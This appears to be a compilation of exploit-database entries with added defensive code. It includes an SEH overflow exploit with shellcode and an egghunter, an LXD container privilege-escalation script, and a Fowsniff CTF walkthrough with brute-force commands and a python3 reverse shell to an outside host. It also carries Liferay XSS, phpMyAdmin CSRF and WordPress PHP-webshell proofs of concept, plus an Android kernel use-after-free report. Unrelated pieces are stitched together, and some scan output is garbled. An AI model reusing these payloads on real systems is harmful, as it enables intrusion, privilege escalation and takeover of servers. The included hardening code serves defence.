"\x38\x4f\x36\x6d\x53\x31\x79\x57\x4a\x42\x49\x62\x42\x72\x42"
"\x77\x4e\x6b\x32\x72\x64\x50\x4e\x6b\x71\x5a\x55\x6c\x4c\x4b"
"\x32\x6c\x37\x61\x31\x68\x79\x73\x43\x78\x67\x71\x58\x51\x52"
"\x71\x4c\x4b\x51\x49\x65\x70\x43\x31\x68\x53\x4c\x4b\x70\x49"
"\x42\x38\x4a\x43\x47\x4a\x71\x59\x6c\x4b\x76\x54\x6e\x6b\x53"
"\x31\x4e\x36\x64\x71\x79\x6f\x4c\x6c\x69\x51\x38\x4f\x66\x6d"
"\x67\x71\x48\x47\x56\x58\x6d\x30\x64\x35\x38\x76\x65\x53\x53"
"\x4d\x59\x68\x35\x6b\x73\x4d\x65\x74\x54\x35\x58\x64\x72\x78"
"\x4c\x4b\x52\x78\x46\x44\x76\x61\x58\x53\x35\x36\x4c\x4b\x56"
"\x6c\x50\x4b\x4e\x6b\x30\x58\x57\x6c\x57\x71\x49\x43\x4e\x6b"
"\x75\x54\x4e\x6b\x56\x61\x48\x50\x4f\x79\x42\x64\x75\x74\x64"
"\x64\x61\x4b\x43\x6b\x33\x51\x43\x69\x50\x5a\x73\x61\x69\x6f"
"\x6b\x50\x63\x6f\x53\x6f\x32\x7a\x6c\x4b\x47\x62\x5a\x4b\x4c"
"\x4d\x71\x4d\x43\x58\x70\x33\x77\x42\x35\x50\x53\x30\x35\x38"
"\x63\x47\x43\x43\x34\x72\x61\x4f\x46\x34\x71\x78\x62\x6c\x51"
"\x67\x67\x56\x73\x37\x39\x6f\x58\x55\x68\x38\x4a\x30\x67\x71"
"\x33\x30\x35\x50\x76\x49\x78\x44\x46\x34\x36\x30\x62\x48\x46"
"\x49\x6b\x30\x50\x6b\x65\x50\x79\x6f\x48\x55\x43\x5a\x37\x78"
"\x50\x59\x62\x70\x5a\x42\x4b\x4d\x51\x50\x70\x50\x73\x70\x30"
"\x50\x61\x78\x4b\x5a\x44\x4f\x39\x4f\x39\x70\x69\x6f\x68\x55"
"\x4d\x47\x70\x68\x77\x72\x43\x30\x47\x61\x73\x6c\x4f\x79\x4d"
"\x36\x52\x4a\x66\x70\x31\x46\x61\x47\x35\x38\x69\x52\x39\x4b"
"\x44\x77\x73\x57\x69\x6f\x6b\x65\x76\x37\x71\x78\x78\x37\x4a"
"\x49\x64\x78\x39\x6f\x79\x6f\x79\x45\x62\x77\x62\x48\x54\x34"
"\x78\x6c\x57\x4b\x79\x71\x79\x6f\x5a\x75\x63\x67\x4e\x77\x33"
"\x58\x30\x75\x32\x4e\x70\x4d\x33\x51\x59\x6f\x6a\x75\x65\x38"
"\x53\x53\x50\x6d\x71\x74\x47\x70\x4b\x39\x6a\x43\x61\x47\x76"
"\x37\x36\x37\x76\x51\x6b\x46\x72\x4a\x37\x62\x52\x79\x63\x66"
"\x7a\x42\x6b\x4d\x61\x76\x6f\x37\x32\x64\x55\x74\x45\x6c\x76"
"\x61\x75\x51\x4e\x6d\x43\x74\x77\x54\x34\x50\x49\x56\x47\x70"
"\x51\x54\x32\x74\x56\x30\x62\x76\x73\x66\x52\x76\x43\x76\x56"
"\x36\x62\x6e\x50\x56\x71\x46\x53\x63\x51\x46\x61\x78\x52\x59"
"\x5a\x6c\x67\x4f\x4d\x56\x59\x6f\x6e\x35\x6c\x49\x6d\x30\x70"
"\x4e\x71\x46\x61\x56\x79\x6f\x44\x70\x45\x38\x56\x68\x4c\x47"
"\x45\x4d\x75\x30\x6b\x4f\x79\x45\x4d\x6b\x4b\x4e\x76\x6e\x54"
"\x72\x48\x6a\x35\x38\x59\x36\x5a\x35\x6d\x6d\x6d\x4d\x49\x6f"
"\x6e\x35\x55\x6c\x36\x66\x43\x4c\x44\x4a\x4d\x50\x59\x6b\x6b"
"\x50\x72\x55\x75\x55\x6f\x4b\x32\x67\x74\x53\x74\x32\x70\x6f"
"\x72\x4a\x73\x30\x52\x73\x39\x6f\x59\x45\x41\x41")

junk  = shell + ("\x41" * 9479) # 10204
nseh = "\xEB\x06\x90\x90"
seh = pack('<I',0x10045f50) # pop pop ret
nop = "\x90" * 86
nop2 = "\x90" * 10

egg = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x79\x6f\x6e\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

todo = junk + nseh + seh + nop + egg + nop2

arch = open("load", "wb")
arch.write(todo)
arch.close()

print informacion
print "\nCreated File size " + str(len(todo))
            
#!/usr/bin/env bash

# ----------------------------------
# Authors: Marcelo Vazquez (S4vitar)
#	   Victor Lasa      (vowkin)
# ----------------------------------

# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
# Step 3: Run this script and you will get root [Victim Machine]
# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine

function helpPanel(){
  echo -e "\nUsage:"
  echo -e "\t[-f] Filename (.tar.gz alpine file)"
  echo -e "\t[-h] Show this help panel\n"
  exit 1
}

function createContainer(){
  lxc image import $filename --alias alpine && lxd init --auto
  echo -e "[*] Listing images...\n" && lxc image list
  lxc init alpine privesc -c security.privileged=true
  lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
  lxc start privesc
  lxc exec privesc sh
  cleanup
}

function cleanup(){
  echo -en "\n[*] Removing container..."
  lxc stop privesc && lxc delete privesc && lxc image delete alpine
  echo " [√]"
}

set -o nounset
set -o errexit

declare -i parameter_enable=0; while getopts ":f:h:" arg; do
  case $arg in
    f) filename=$OPTARG && let parameter_enable+=1;;
    h) helpPanel;;
  esac
done

if [ $parameter_enable -ne 1 ]; then
  helpPanel
else
  createContainer
fi
            

1. Information gathering

1. Scan for live hosts

arp-scan -l

We found that 192.168.1.13 is the IP address of the target machine.

2. Port scan

Next, scan the target IP address with Nmap. The command is as follows:

root@kali2018:~# nmap -A 192.168.1.13

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-13 01:18 EST
Nmap scan report for 192.168.1.13
Host is up (0.0014s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
|   256 53:9D:2:67:34:CF:0A:D5:5A:9A:113:74:BD33333333333333333333:DSE3333333333:DS)
|_  256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b13:d7:1b:66:83 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fowsniff Corp - Delivering Solutions
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE UIDL SASL(PLAIN) PIPELINING USER CAPA TOP RESP-CODES
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: have OK
MAC Address: 08:00:27:1E:80:B0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.38 ms 192.168.1.13

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.44 seconds

The scan results show that four ports are open: 22 (SSH), 80 (HTTP), 110 (POP3) and 143 (IMAP).

2. Compromising the target machine

1. First, check whether port 80 yields anything. Open it in a browser.

It looks like a static HTML page; scrolling down, there is an announcement carrying the handle @fowsniffcorp.

Nothing was found on the page, and continuing with dirb and nikto scans did not turn up anything useful either.

root@kali2018:~# dirb http://192.168.1.13

root@kali2018:~# nikto -h http://192.168.1.13

So I googled the "Fowsniff Corp" shown on the page.

I found the Fowsniff Twitter account (@fowsniffcorp) with a pinned tweet:

Opening the linked address https://pastebin.com/nraqveex shows the email users and passwords leaked from the website's mailboxes.

The passwords are MD5 hashes; they can be cracked with SOMD5 (https://www.somd5.com/batch.html) or hashcat.

Next, build username and password wordlists and brute-force POP3 with Hydra.

First, paste all usernames into user.txt and all passwords into pass.txt.

POP3 logins can also be brute-forced with MSF. The commands and settings are as follows:

msf > use auxiliary/scanner/pop3/pop3_login
msf auxiliary(scanner/pop3/pop3_login) > set rhosts 192.168.1.13
rhosts => 192.168.1.13
msf auxiliary(scanner/pop3/pop3_login) > set user_file /opt/user.txt
user_file => /opt/user.txt
msf auxiliary(scanner/pop3/pop3_login) > set pass_file /opt/pass.txt
pass_file => /opt/pass.txt
msf auxiliary(scanner/pop3/pop3_login) > set verbose false
verbose => false
msf auxiliary(scanner/pop3/pop3_login) > exploit

After running it, the valid credentials "seina:scoobydoo2" were found, as shown in the figure.

The mailbox can be brute-forced with Hydra as follows:

hydra -L users.txt -P pass.txt -f {ip} pop3

-L ~ username wordlist

-P ~ password wordlist

-f ~ stop cracking once a valid user is found

root@kali2018:/opt# hydra -L user.txt -P pass.txt -f 192.168.1.13 pop3

We can see that the username seina and its password were brute-forced successfully.

Next, connect to the target's POP3 service and log in with the credentials just obtained. After logging in, list the mailbox: there are two messages. The commands are as follows:

root@kali2018:/opt# nc 192.168.1.13 110
+OK Welcome to the Fowsniff Corporate Mail Server!
user seina
+OK
pass scoobydoo2
+OK Logged in.
list
+OK 2 messages:
1 1622
2 1280

The list command shows whether there is any mail; here there are two messages. A message is then read with RETR [ID].

Reading the first message reveals a temporary SSH password: "s1ck3nbluff+secureShell".

retr 1
+OK 1622 octets
Return-Path: stone@fowsniff
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
        id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
    mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
    tegel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: 20180313185107.0FA3916A@fowsniff
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)

Dear all,

A few days ago, a malicious actor was able to gain entry to our internal email system. The attacker was able to exploit incorrectly filtered escape characters within our SQL database to access login credentials. Both the SQL and authentication systems used legacy methods that had not been updated for some time.

We have been instructed to perform a complete internal system overhaul. Our main systems are "in the shop", but we have moved to this isolated, temporary server with minimal functionality.

This server can send and receive mail, but only locally. That means you can only send mail to other users, not to the World Wide Web. You can, however, access this system via the SSH protocol.

The temporary password for SSH is "s1ck3nbluff+secureShell"

You must change this password as soon as possible, under my guidance. I saw the leak the attacker posted online, and your passwords were not very secure.

Come see me in my office at your earliest convenience and we'll set it up.

Thanks,

A.J Stone

Next, check the second message. Its sender is baksteen@fowsniff, so we can infer that the username is baksteen.

retr 2
+OK 1280 octets
Return-Path: baksteen@fowsniff
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1004)
        id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
To: seina@fowsniff
Subject: You missed out!
Message-Id: 20180313185405.101ca1ac2@fowsniff
Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
From: baksteen@fowsniff

Devin,

You should have seen the brass lay into AJ today! We are going to be talking about this one for a long time. Who knew the regional manager had been in the navy? She was swearing like a sailor!

I don't know what kind of pneumonia or whatever you brought back with you from your camping trip, but I think I'm coming down with it myself. How long were you gone - a week? Next time you're going to get sick and miss the managerial blowout of the century, at least keep it to yourself!

I'm going to head home early and eat some chicken soup. I think I got an email from Stone too, but it's probably just some face-saving "let me explain the tone of my meeting with management". I'll read it when I get back.

Feel better,

Skyler

PS: Change your email password. AJ was telling us to do that right before Captain Profanity showed up.

Next, log in over SSH with the credentials just obtained, i.e. username baksteen and password s1ck3nbluff+secureShell.

root@kali2018:/opt# ssh baksteen@192.168.1.13

3. Privilege escalation

1. First privilege-escalation method

Login succeeded. After enumerating the system, I found that the user baksteen belongs to two different groups. Searching for files belonging to the users group turned up the script cube.sh. The search command is as follows:

baksteen@fowsniff:~$ find / -group users -type f 2>/dev/null

Looking at the content of this script file, it contains the banner text shown after logging in via SSH; you can see this by comparing it with the screenshot above taken after the successful SSH login.

baksteen@fowsniff:~$ cd /opt/cube

baksteen@fowsniff:/opt/cube$ ls

baksteen@fowsniff:/opt/cube$ cat cube.sh

Open the file with vim and append a line with a Python reverse-shell command at the end of the file:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.21",1234))

As shown in the picture:

After saving, running the script reports an error: "python: command not found". So I searched the system for Python and found that Python 3 is installed, as shown in the figures.

So change the reverse-shell command to use python3, as follows:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.29",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);
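The foothold in this section is a script that members of the users group can edit. The following audit, added here and not part of the write-up, walks a directory tree and reports every script that group members or everyone can modify; the sample tree it builds in a temporary directory is constructed and mirrors the /opt/cube/cube.sh finding.

```python
"""Audit a directory tree for scripts writable by users other than the owner.
Added example, not code from the write-up; the sample tree is constructed."""
import grp
import os
import stat
import tempfile


def is_script(path):
    """A file is treated as a script when it starts with a shebang."""
    try:
        with open(path, "rb") as fh:
            return fh.read(2) == b"#!"
    except OSError:
        return False


def writable_by_non_owner(mode):
    """Return the permission bits that let non-owners modify the file."""
    bits = []
    if mode & stat.S_IWGRP:
        bits.append("group-writable")
    if mode & stat.S_IWOTH:
        bits.append("world-writable")
    return bits


def group_name(gid):
    """Owning group as a name where the system knows it, else the raw gid."""
    try:
        return grp.getgrgid(gid).gr_name
    except KeyError:
        return str(gid)


def find_writable_scripts(root):
    """Walk root and list (relative path, owning group, bits) for every
    regular script file that group members or everyone can write to."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat: do not follow symlinks
            if not stat.S_ISREG(st.st_mode) or not is_script(path):
                continue
            bits = writable_by_non_owner(st.st_mode)
            if bits:
                findings.append((os.path.relpath(path, root), group_name(st.st_gid), bits))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample: a group-writable banner script (the cube.sh case),
    a correctly permissioned script, and a writable file that is not a script."""
    root = tempfile.mkdtemp(prefix="script-audit-")
    os.makedirs(os.path.join(root, "opt", "cube"))
    samples = {
        "opt/cube/cube.sh": ("#!/bin/bash\necho 'Fowsniff Corp banner'\n", 0o775),
        "opt/cube/safe.sh": ("#!/bin/bash\necho ok\n", 0o755),
        "opt/cube/notes.txt": ("not a script\n", 0o777),
    }
    for rel, (content, mode) in samples.items():
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for rel, group, bits in find_writable_scripts(sample_root):
        print(f"{rel}: owned by group {group}, {', '.join(bits)}")
```

Run against a real host as root with `find_writable_scripts("/")` the same logic flags any login banner or cron script that a low-privileged group could rewrite.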

# Exploit Title: Liferay Portal < 7.1 CE GA4 / SimpleCaptcha API XSS
# Date: 04/06/2019
# Exploit Author: Valerio Brussani (@val_brux)
# Website: www.valbrux.it
# Vendor Homepage: https://www.liferay.com/
# Software Link: https://www.liferay.com/it/downloads-community
# Version: < 7.1 CE GA4
# Tested on: Liferay Portal 7.1 CE GA3
# CVE: CVE-2019-6588
# Reference1: https://dev.liferay.com/web/community-security-team/known-vulnerabilities/liferay-portal-71/-/asset_publisher/7v4O7y85hZMo/content/cst-7130-multiple-xss-vulnerabilities-in-7-1-ce-ga3
# Reference2: https://www.valbrux.it/blog/2019/06/04/cve-2019-6588-liferay-portal-7-1-ce-ga4-simplecaptcha-api-xss/


Introduction
In Liferay Portal before 7.1 CE GA4, an XSS vulnerability exists in the SimpleCaptcha API when custom code passes unsanitized input 
into the "url" parameter of the JSP taglib call <liferay-ui:captcha url="<%= url %>" /> or <liferay-captcha:captcha url="<%= url %>" />. 
A customized Liferay portlet which directly calls the Simple Captcha API without sanitizing the input could be susceptible to this vulnerability.
 
Poc
In a sample scenario where custom code calls the <liferay-ui:captcha url="<%= url %>" /> JSP taglib, append a payload like the following to the body parameters of a customized form:
 
&xxxx%22%3e%3cscript%3ealert(1)</script> 
 
The script is reflected into the src attribute of the <img> tag responsible for fetching the next available captcha:
 
<img alt="xxx" class="xxxx" src="xxxxxx"><script>alert(1)</script>=" />
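Added example, not Liferay's code: the two render functions are hypothetical stand-ins for the taglib's <img> output and show why the reflected url value needs HTML-attribute encoding; the payload is the advisory's, URL-decoded.

```python
"""Attribute-context encoding of the reflected captcha url parameter.
Added example, not Liferay's code; render functions are stand-ins."""
import html
import re
from urllib.parse import unquote

# The value the advisory appends to the form body, as it arrives after URL-decoding.
ENCODED_PAYLOAD = "xxxx%22%3e%3cscript%3ealert(1)</script>"
PAYLOAD = unquote(ENCODED_PAYLOAD)  # xxxx"><script>alert(1)</script>

# Every unescaped '<' followed by a letter, '/' or '!' starts a tag for the browser.
TAG_START = re.compile(r"<[A-Za-z/!]")


def render_captcha_img_unsafe(url):
    """Pre-fix behaviour: the url value is concatenated into the attribute raw."""
    return '<img alt="captcha" class="captcha" src="' + url + '" />'


def render_captcha_img_safe(url):
    """Hardened rendering: encode the value for an HTML attribute context.
    quote=True turns the double quote into &quot;, so the browser cannot
    leave the src attribute no matter what the input contains."""
    return '<img alt="captcha" class="captcha" src="' + html.escape(url, quote=True) + '" />'


def count_tags(markup):
    """Crude count of the tags a browser would see; an intact <img> yields 1."""
    return len(TAG_START.findall(markup))


if __name__ == "__main__":
    print(render_captcha_img_unsafe(PAYLOAD))
    print(render_captcha_img_safe(PAYLOAD))
```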
            
# Exploit Title: Cross Site Request Forgery (CSRF)
# Date: 11 June 2019
# Exploit Author: Riemann
# Vendor Homepage: https://www.phpmyadmin.net/
# Software Link: https://www.phpmyadmin.net/downloads/
# Version: 4.8
# Tested on: UBUNTU 16.04 LTS -Installed Docker image - docker pull phpmyadmin/phpmyadmin:4.8 
# CVE : 2019-12616

# Description
# An issue was discovered in phpMyAdmin before 4.9.0. A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) to the victim.	


#VULNERABILITY:
The following request, a form submission, is sent using the "GET" method instead of "POST":
<form method="get" action="index.php" class="disableAjax">

GET http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+%60pma__bookmark%60+(%60id%60%2C+%60dbase%60%2C+%60user%60%2C+%60label%60%2C+%60query%60)+VALUES+(DAYOFWEEK(%27%27)%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27)&show_query=1&db=phpmyadmin&table=pma__bookmark HTTP/1.1

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Cookie: pmaCookieVer=5; pma_lang=en; pma_collation_connection=utf8mb4_unicode_ci; pmaUser-1=%7B%22iv%22%3A%22M16ZzlA0rqF9BZ1jFsssjQ%3D%3D%22%2C%22mac%22%3A%22804941d12fceca0997e181cbcb8427d68c668240%22%2C%22payload%22%3A%22mD9juTxAYhC7lA7XPWHWOw%3D%3D%22%7D; phpMyAdmin=9bdd66557e399fc1447bf253bc2dc133
Upgrade-Insecure-Requests: 1
Host: localhost:9000

An attacker can easily craft a hyperlink containing the request they want executed on behalf of the user, which makes a CSRF attack possible because of the wrong HTTP method.

#POC
<!doctype html>

<html lang="en">
<head>
  <meta charset="utf-8">
  <title>POC CVE-2019-12616</title>
</head>

<body>
<a href="http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+`pma__bookmark`+(`id`%2C+`dbase`%2C+`user`%2C+`label`%2C+`query`)+VALUES+(DAYOFWEEK('')%2C+''%2C+''%2C+''%2C+'')&show_query=1&db=phpmyadmin&table=pma__bookmark">View my Pictures!</a>
</body>
</html>
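Added example, not phpMyAdmin's code: a request gate that refuses state-changing SQL over GET and demands a per-session anti-CSRF token on POST. POC_URL is the GET request captured above; SESSION_TOKEN is a constructed sample value.

```python
"""Gate state-changing SQL submissions by HTTP method and anti-CSRF token.
Added example, not phpMyAdmin's code; SESSION_TOKEN is a constructed value."""
import hmac
import re
from urllib.parse import parse_qs, urlsplit

# The GET request from the advisory: its sql_query is an INSERT.
POC_URL = (
    "http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+%60pma__bookmark%60+"
    "(%60id%60%2C+%60dbase%60%2C+%60user%60%2C+%60label%60%2C+%60query%60)+VALUES+"
    "(DAYOFWEEK(%27%27)%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27)"
    "&show_query=1&db=phpmyadmin&table=pma__bookmark"
)
SESSION_TOKEN = "constructed-session-token-0123"

# Statements that change data or schema. SELECT/SHOW/EXPLAIN may still be
# shared as links, which is the one legitimate use of GET here.
STATE_CHANGING = re.compile(
    r"^(INSERT|UPDATE|DELETE|REPLACE|DROP|ALTER|CREATE|TRUNCATE|RENAME|GRANT|REVOKE|SET|LOAD)\b",
    re.IGNORECASE,
)
LEADING_COMMENT = re.compile(r"^\s*(?:/\*.*?\*/|--[^\n]*\n|#[^\n]*\n)", re.DOTALL)


def strip_leading_comments(sql):
    """Drop comments in front of the statement so '/* */ DELETE ...' is still
    recognised. A production gate would ask the SQL parser, not a regex."""
    while True:
        stripped = LEADING_COMMENT.sub("", sql, count=1)
        if stripped == sql:
            return sql.lstrip()
        sql = stripped


def extract_sql_query(url):
    """Pull the decoded sql_query parameter out of a request URL."""
    return parse_qs(urlsplit(url).query).get("sql_query", [""])[0]


def is_state_changing(sql):
    return bool(STATE_CHANGING.match(strip_leading_comments(sql)))


def gate(method, url, token=None, session_token=SESSION_TOKEN):
    """Decide whether the request may run its sql_query. Returns (allowed, reason)."""
    sql = extract_sql_query(url)
    if not is_state_changing(sql):
        return True, "read-only statement"
    if method.upper() != "POST":
        return False, "state-changing SQL must be submitted with POST"
    # Constant-time comparison of the submitted token with the session's.
    if token is None or not hmac.compare_digest(token, session_token):
        return False, "missing or invalid anti-CSRF token"
    return True, "ok"


if __name__ == "__main__":
    print(gate("GET", POC_URL))
    print(gate("POST", POC_URL, token=SESSION_TOKEN))
```

Marking the session cookie SameSite=Lax would additionally stop the cookie from riding along on the cross-site link click itself.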
            
# Exploit Title: Authenticated code execution in `insert-or-embed-articulate-content-into-wordpress` Wordpress plugin
# Description: It is possible to upload and execute a PHP file using the plugin option to upload a zip archive 
# Date: june 2019
# Exploit Author: xulchibalraa
# Vendor Homepage: https://wordpress.org/plugins/insert-or-embed-articulate-content-into-wordpress/
# Software Link: https://downloads.wordpress.org/plugin/insert-or-embed-articulate-content-into-wordpress.4.2995.zip
# Version: 4.2995 <= 4.2997 
# Tested on: Wordpress 5.1.1, PHP 5.6 
# CVE : -


## 1. Create a .zip archive with 2 files: index.html, index.php

echo "<html>hello</html>" > index.html
echo "<?php echo system($_GET['cmd']); ?>" > index.php
zip poc.zip index.html index.php 

## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even `Contributors` role have access to it)
## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;)
## 4. Access the webshell from the URL displayed after upload similar to 

http://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami
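Added example, not the plugin's code: an archive validator to run before anything is extracted under the web root, rejecting server-executable files, server configuration files and path traversal. build_poc_zip() constructs the advisory's poc.zip in memory.

```python
"""Validate an uploaded zip before extracting it into a web-served directory.
Added example, not the plugin's code; the archives below are constructed."""
import io
import posixpath
import zipfile

# Extensions the web server would execute or interpret server-side.
BLOCKED_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "cgi", "pl", "sh", "py"}
# An e-learning package only needs static assets.
ALLOWED_EXTENSIONS = {"html", "htm", "js", "css", "json", "xml", "txt", "png", "jpg", "jpeg",
                      "gif", "svg", "mp3", "mp4", "woff", "woff2"}
CONFIG_FILES = {".htaccess", ".user.ini", "web.config"}


def member_problem(name):
    """Return why this archive member must not be extracted, or None if it is fine."""
    if "\\" in name or name.startswith("/"):
        return "absolute or backslash path"
    if ".." in posixpath.normpath(name).split("/"):
        return "path traversal"
    if name.endswith("/"):
        return None  # directory entry, nothing to execute
    base = posixpath.basename(name).lower()
    if base in CONFIG_FILES:
        return "server configuration file"
    # Check every extension segment so shell.php.txt is caught as well.
    segments = base.split(".")[1:]
    if any(seg in BLOCKED_EXTENSIONS for seg in segments):
        return "server-executable file type"
    if not segments or segments[-1] not in ALLOWED_EXTENSIONS:
        return "extension not on the allow-list"
    return None


def validate_archive(data, max_total_bytes=50 * 1024 * 1024):
    """Return a list of (member, reason); an empty list means safe to extract."""
    problems = []
    total = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            total += info.file_size  # uncompressed size, checked before extraction
            reason = member_problem(info.filename)
            if reason:
                problems.append((info.filename, reason))
    if total > max_total_bytes:
        problems.append(("<archive>", "uncompressed size exceeds limit"))
    return problems


def _zip_from(files):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_poc_zip():
    """Constructed copy of the advisory's archive: index.html plus a PHP shell."""
    return _zip_from({"index.html": "<html>hello</html>",
                      "index.php": "<?php echo system($_GET['cmd']); ?>"})


def build_clean_zip():
    """Constructed benign package containing only static assets."""
    return _zip_from({"index.html": "<html>hello</html>",
                      "story_content/main.js": "console.log('ok');"})


if __name__ == "__main__":
    print(validate_archive(build_poc_zip()))
    print(validate_archive(build_clean_zip()))
```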
            
The following issue exists in the android-msm-wahoo-4.4-pie branch of
https://android.googlesource.com/kernel/msm (and possibly others):

When kgsl_mem_entry_destroy() in drivers/gpu/msm/kgsl.c is called for a writable
entry with memtype KGSL_MEM_ENTRY_USER, it attempts to mark the entry's pages
as dirty using the function set_page_dirty(). This function first loads
page->mapping using page_mapping(), then calls the function pointer
mapping->a_ops->set_page_dirty.

The bug is that, as explained in upstream commit e92bb4dd9673
( https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e92bb4dd9673945179b1fc738c9817dd91bfb629),
the mapping of a page can be freed concurrently unless it is protected somehow
(e.g. by holding the page lock, or by holding a reference to the mapping).
For callers who don't hold any such lock or reference, set_page_dirty_lock() is
provided to safely mark a page as dirty:

==================================
/*
 * set_page_dirty() is racy if the caller has no reference against
 * page->mapping->host, and if the page is unlocked.  This is because another
 * CPU could truncate the page off the mapping and then free the mapping.
 *
 * Usually, the page _is_ locked, or the caller is a user-space process which
 * holds a reference on the inode by having an open file.
 *
 * In other cases, the page should be locked before running set_page_dirty().
 */
int set_page_dirty_lock(struct page *page)
{
        int ret;

        lock_page(page);
        ret = set_page_dirty(page);
        unlock_page(page);
        return ret;
}
==================================


To reproduce on a Pixel 2 (walleye):

 - Check out the tree specified above.
 - Enable KASAN in the kernel config.
 - Apply the attached kernel patch kgsl-bigger-race-window.patch to make the
   race window much bigger.
 - Build and boot the kernel.
 - Build the attached poc.c with
   `aarch64-linux-gnu-gcc -static -o poc poc.c -Wall`.
 - Run the PoC on the device (adb push, then run from adb shell).

You should see a kernel crash like this; note KASAN's report of a UAF in
set_page_dirty():

==================================
<6>[  445.698708] c3    688 mdss_fb_blank_sub: mdss_fb_blank+0x1d0/0x2b4 mode:0
<3>[  447.372706] c3   2621 ==================================================================
<3>[  447.372963] c3   2621 BUG: KASAN: use-after-free in set_page_dirty+0x4c/0xd0
<3>[  447.380051] c3   2621 Read of size 8 at addr 0000000000000000 by task kworker/3:3/2621
<3>[  447.387059] c3   2621 
<4>[  447.394762] c3   2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45
<4>[  447.397158] c3   2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
<4>[  447.406473] c3   2621 Workqueue: kgsl-mementry _deferred_put
<4>[  447.418479] c3   2621 Call trace:
<4>[  447.418660] c3   2621 [<ffffffa689e8dfbc>] dump_backtrace+0x0/0x2b4
<4>[  447.421952] c3   2621 [<ffffffa689e8e394>] show_stack+0x14/0x1c
<4>[  447.428066] c3   2621 [<ffffffa68a2f3d2c>] dump_stack+0xa4/0xcc
<4>[  447.433965] c3   2621 [<ffffffa68a07b254>] print_address_description+0x94/0x340
<4>[  447.439870] c3   2621 [<ffffffa68a07b784>] kasan_report+0x1f8/0x340
<4>[  447.447145] c3   2621 [<ffffffa68a079a10>] __asan_load8+0x74/0x90
<4>[  447.453407] c3   2621 [<ffffffa68a0205b4>] set_page_dirty+0x4c/0xd0
<4>[  447.459621] c3   2621 [<ffffffa68a6c5dec>] kgsl_mem_entry_destroy+0x1c0/0x218
<4>[  447.465695] c3   2621 [<ffffffa68a6c63d8>] _deferred_put+0x34/0x3c
